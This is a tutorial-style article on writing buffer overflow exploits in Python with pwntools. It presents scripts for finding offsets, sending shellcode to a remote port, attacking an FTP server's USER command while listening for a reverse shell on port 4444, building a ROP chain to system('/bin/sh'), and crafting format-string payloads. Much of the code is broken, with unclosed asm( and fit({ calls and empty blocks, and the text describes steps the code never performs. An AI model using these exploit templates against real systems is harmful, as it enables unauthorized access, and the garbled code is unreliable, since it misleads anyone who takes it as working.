Python Script for Buffer Overflow Exploits

Python Script for Buffer Overflow Exploits

This article is for educational purposes only. Unauthorized use of buffer overflow exploits is illegal and unethical. Always obtain proper authorization before testing security vulnerabilities. Misuse of this information may lead to criminal charges.

Buffer overflow exploits are a common technique used in cybersecurity to manipulate program behavior by overwriting memory. Python is an excellent language for creating these exploits due to its simplicity and powerful libraries. In this article, we’ll explore how to create Python scripts for buffer overflow exploits, complete with code examples, use cases, and a real-life example.

Understanding Buffer Overflows

A buffer overflow occurs when a program writes more data to a buffer than it can hold. This can lead to overwriting adjacent memory locations, potentially allowing an attacker to execute arbitrary code.

graph LR
    A[Input Data] --> B[Buffer]
    B --> C[Adjacent Memory]
    C --> D[Overwritten Data]
    D --> E[Arbitrary Code Execution]

Basic Python Script for Buffer Overflow

Let’s start with a basic Python script that generates a long string of characters, which can be used to test for buffer overflows:
#!/usr/bin/env python3

import numpy as np

buffer_size = 100
overflow_string = np.repeat('A', buffer_size).tobytes()


This script creates a string of 100 ‘A’ characters using NumPy for efficiency, which can be used to test if a program is vulnerable to buffer overflows.

Creating a Cyclic Pattern

To identify the exact offset where the buffer overflow occurs, we can use a cyclic pattern:
from pwn import *

context.update(arch='i386', os='linux')
pattern = cyclic(1000, n=4)

This script uses the pwntools library to generate a cyclic pattern of 1000 characters, optimized for 32-bit systems.

Identifying the Offset

Once we’ve crashed the program with our cyclic pattern, we can find the offset:
from pwn import *

context.update(arch='i386', os='linux')

# EIP value after crash
crash_eip = 0x61616174

# Find the offset
offset = cyclic_find(crash_eip, n=4)
print(f"Offset: {offset}")

Crafting the Exploit

Now that we know the offset, we can craft our exploit:
from pwn import *

context.update(arch='i386', os='linux')

# Target information
target_ip = ""
target_port = 9999

# Exploit details
offset = 524
shellcode = asm(
return_address = p32(0xbffff7c0)

# Craft payload
payload = fit({
    0: b'A' * offset,
    offset: return_address,
    offset + 4: shellcode

# Connect to target and send payload
with remote(target_ip, target_port) as conn:

This script crafts a payload that includes the offset, a return address, and shellcode to spawn a shell, using pwntools for better efficiency and readability.

Real-Life Example: Exploiting a Vulnerable FTP Server

Let’s consider a real-life scenario where we exploit a vulnerable FTP server. For this example, we’ll use a hypothetical FTP server with a buffer overflow vulnerability in its login function.
from pwn import *
import ftplib

context.update(arch='i386', os='linux')

# Target information
target_ip = ""
target_port = 21

# Exploit details
offset = 230
ret_addr = p32(0xbffff7c0)
shellcode = asm(

# Craft payload
payload = fit({
    0: b'A' * offset,
    offset: ret_addr,
    offset + 4: shellcode

# Function to send exploit
def send_exploit(ip, port, payload):
        with ftplib.FTP() as ftp:
            ftp.connect(ip, port)
            ftp.sendcmd(f"USER {payload.decode()}")

# Send exploit and start listener
send_exploit(target_ip, target_port, payload)
l = listen(4444)

This script exploits a buffer overflow vulnerability in the FTP server’s USER command. Here’s a detailed explanation:

  1. We set up the target information and exploit details, including the offset, return address, and shellcode.
  2. The payload is crafted using pwntoolsfit function, which allows us to precisely place our shellcode and return address.
  3. We define a function send_exploit that connects to the FTP server and sends our payload as the username.
  4. After sending the exploit, we set up a listener on port 4444, waiting for the reverse shell connection.
  5. Once connected, we enter an interactive session with the shell.

This example demonstrates how a simple buffer overflow can be used to gain unauthorized access to an FTP server, highlighting the importance of proper input validation and memory management in network services.

Use Cases

  1. Web Application Security Testing: Buffer overflow exploits can be used to test the security of web applications, especially those with native components or plugins written in C or C++.

  2. Network Service Auditing: Many network services, like FTP, SMTP, or custom protocols, can be vulnerable to buffer overflows. Auditing these services helps identify and patch vulnerabilities before they can be exploited.

  3. Operating System Security: Buffer overflows can be used to escalate privileges on an operating system, allowing researchers to identify and report critical vulnerabilities.

  4. IoT Device Testing: Many IoT devices run on embedded systems that may be vulnerable to buffer overflows. Testing these devices can help improve the security of smart home and industrial IoT ecosystems.

  5. Legacy System Assessment: Older systems often lack modern protections against buffer overflows. Assessing these systems can help organizations understand their risk exposure and plan for updates or mitigations.

Advanced Techniques

ROP (Return-Oriented Programming)

When dealing with systems that have memory protections like DEP (Data Execution Prevention), we can use ROP chains:
from pwn import *

context.update(arch='amd64', os='linux')

# ROP gadgets
pop_rdi = p64(0x400683)
pop_rsi_r15 = p64(0x400681)
system_plt = p64(0x4004e0)

# Payload
payload = fit({
    40: pop_rdi,
    48: p64(0x601018),  # Address of "/bin/sh" string
    56: pop_rsi_r15,
    64: p64(0),
    72: p64(0),
    80: system_plt


Format String Exploitation

Format string vulnerabilities can also lead to buffer overflows:
from pwn import *

context.update(arch='i386', os='linux')

# Target address to overwrite
target_addr = 0x804a014

# Payload
payload = fmtstr_payload(10, {target_addr: 0x12345678})



Buffer overflow exploits, while powerful, should be used responsibly and ethically. Always obtain proper authorization before testing for vulnerabilities, and use this knowledge to improve system security rather than exploit it maliciously.

For a deeper understanding of buffer overflows, consider studying assembly language and computer architecture. The mathematical representation of a buffer overflow can be expressed as:

$$ \text{Buffer Size} < \text{Input Size} \Rightarrow \text{Overflow} $$

Remember, the key to successful exploitation is understanding the target system’s memory layout and protections. Always stay updated on the latest security measures and exploit techniques to ensure your skills remain relevant in the ever-evolving field of cybersecurity.

For further reading on buffer overflow research and modern exploitation techniques, consider the following resources:

  1. Exploiting Stack Buffer Overflows in 2022
  2. Modern Binary Exploitation by RPISEC
  3. The Shellcoder’s Handbook: Discovering and Exploiting Security Holes